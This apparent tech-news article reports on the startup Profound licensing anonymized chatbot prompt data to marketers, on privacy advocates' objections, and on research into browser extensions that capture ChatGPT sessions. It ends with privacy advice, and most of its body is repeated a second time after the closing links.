When you type a question into a chatbot, you assume the conversation stays between you and the machine. That trust is being tested. A recent PCMag investigation uncovered how a New York analytics startup called Profound has been selling access to anonymized records of user prompts from major AI tools, including ChatGPT, Google Gemini, and Anthropic’s Claude.
Profound’s product, known as Prompt Volumes, packages aggregated chatbot data for marketers who want to spot trending interests before they hit search engines. The company claims everything is scrubbed of names and personal details. Still, the discovery has rattled privacy advocates. The dataset isn’t theoretical, it’s built from what people actually type when they believe no one else is watching.
Image: tryprofound.
According to PCMag’s findings, Profound has been licensing these datasets to corporate clients for months, long before the story surfaced. Some of the stored queries reveal deeply personal topics, medical, financial, and relationship concerns. They may be anonymized, but the pattern of questions paints an intimate picture of user behavior.
Marketing visibility consultant Lee Dryburgh, who runs a small firm called Contestra, has been warning about this practice. He argues that users rarely realize browser extensions could be funneling their chatbot conversations to third-party firms. “AI chats are not casual searches,” he wrote on his research feed. “They’re confessions.” Profound responded by accusing him of brand damage and issued a cease-and-desist letter, an aggressive move that only drew more attention to the case.
Profound says it never collects data directly. Instead, it “licenses opt-in consumer panels” from established providers, the same model used for decades in advertising analytics. It points to Datos, a subsidiary of Semrush, as one of those sources. Earlier this year, Semrush briefly mentioned supplying user data to Profound in a marketing article, before quietly editing out the reference.
For privacy groups, the explanation sounds too tidy. The Electronic Frontier Foundation (EFF) argues that even anonymized data can often be traced back to individuals when combined with demographics or regional tags. The organization calls for laws requiring stronger consent and transparency. Its stance echoes a simple principle found across moral traditions: information shared in confidence deserves protection.
Security researchers also found evidence that browser extensions may be a weak link. At Georgia Tech, cybersecurity professor Frank Li and his team used a system called Arcanum to analyze extensions from the Chrome Web Store. They discovered that several with permission to read website data could extract full ChatGPT sessions, including prompts and responses. While not every extension behaved this way, enough did to raise concern. Some extensions only collect after a user logs in or enables data-sharing features, meaning many people might be opting in without realizing it.
Profound maintains that its data supply chain is legal and compliant with privacy laws like the GDPR and CCPA. Still, the opacity of these consent flows makes it hard for users to confirm whether their prompts are in those “opt-in” panels or not.
What emerges is a quiet market built on people’s curiosity and trust. Chatbots have become digital confidants; marketers now view those confessions as data points. The arrangement may follow the letter of privacy law, but it brushes against its spirit.
The ethical question is no longer only about who collects data but who interprets it, and for what purpose. When intimate questions become trend metrics, the line between research and exploitation thins. Transparency, not technical compliance, will decide whether users continue to speak freely to AI or start holding back.
Until that happens, the advice is simple: treat your chatbot like an open forum, not a diary. Disable unnecessary extensions, use private mode, and assume someone, somewhere, might be listening. Because as this week’s investigation shows, the conversation about privacy is no longer hypothetical, it’s already for sale.
Note: This post was edited/created using GenAI tools.
Read next:
• The Future of Insights in 2026: How AI is Evolving Researchers’ Roles
• Study Finds Popular AI Models Unsafe to Power Robots in the Real World
Profound’s product, known as Prompt Volumes, packages aggregated chatbot data for marketers who want to spot trending interests before they hit search engines. The company claims everything is scrubbed of names and personal details. Still, the discovery has rattled privacy advocates. The dataset isn’t theoretical, it’s built from what people actually type when they believe no one else is watching.
Image: tryprofound.
According to PCMag’s findings, Profound has been licensing these datasets to corporate clients for months, long before the story surfaced. Some of the stored queries reveal deeply personal topics, medical, financial, and relationship concerns. They may be anonymized, but the pattern of questions paints an intimate picture of user behavior.
Marketing visibility consultant Lee Dryburgh, who runs a small firm called Contestra, has been warning about this practice. He argues that users rarely realize browser extensions could be funneling their chatbot conversations to third-party firms. “AI chats are not casual searches,” he wrote on his research feed. “They’re confessions.” Profound responded by accusing him of brand damage and issued a cease-and-desist letter, an aggressive move that only drew more attention to the case.
Profound says it never collects data directly. Instead, it “licenses opt-in consumer panels” from established providers, the same model used for decades in advertising analytics. It points to Datos, a subsidiary of Semrush, as one of those sources. Earlier this year, Semrush briefly mentioned supplying user data to Profound in a marketing article, before quietly editing out the reference.
For privacy groups, the explanation sounds too tidy. The Electronic Frontier Foundation (EFF) argues that even anonymized data can often be traced back to individuals when combined with demographics or regional tags. The organization calls for laws requiring stronger consent and transparency. Its stance echoes a simple principle found across moral traditions: information shared in confidence deserves protection.
Security researchers also found evidence that browser extensions may be a weak link. At Georgia Tech, cybersecurity professor Frank Li and his team used a system called Arcanum to analyze extensions from the Chrome Web Store. They discovered that several with permission to read website data could extract full ChatGPT sessions, including prompts and responses. While not every extension behaved this way, enough did to raise concern. Some extensions only collect after a user logs in or enables data-sharing features, meaning many people might be opting in without realizing it.
Profound maintains that its data supply chain is legal and compliant with privacy laws like the GDPR and CCPA. Still, the opacity of these consent flows makes it hard for users to confirm whether their prompts are in those “opt-in” panels or not.
What emerges is a quiet market built on people’s curiosity and trust. Chatbots have become digital confidants; marketers now view those confessions as data points. The arrangement may follow the letter of privacy law, but it brushes against its spirit.
The ethical question is no longer only about who collects data but who interprets it, and for what purpose. When intimate questions become trend metrics, the line between research and exploitation thins. Transparency, not technical compliance, will decide whether users continue to speak freely to AI or start holding back.
Until that happens, the advice is simple: treat your chatbot like an open forum, not a diary. Disable unnecessary extensions, use private mode, and assume someone, somewhere, might be listening. Because as this week’s investigation shows, the conversation about privacy is no longer hypothetical, it’s already for sale.
Note: This post was edited/created using GenAI tools.
Read next:
• The Future of Insights in 2026: How AI is Evolving Researchers’ Roles
• Study Finds Popular AI Models Unsafe to Power Robots in the Real World
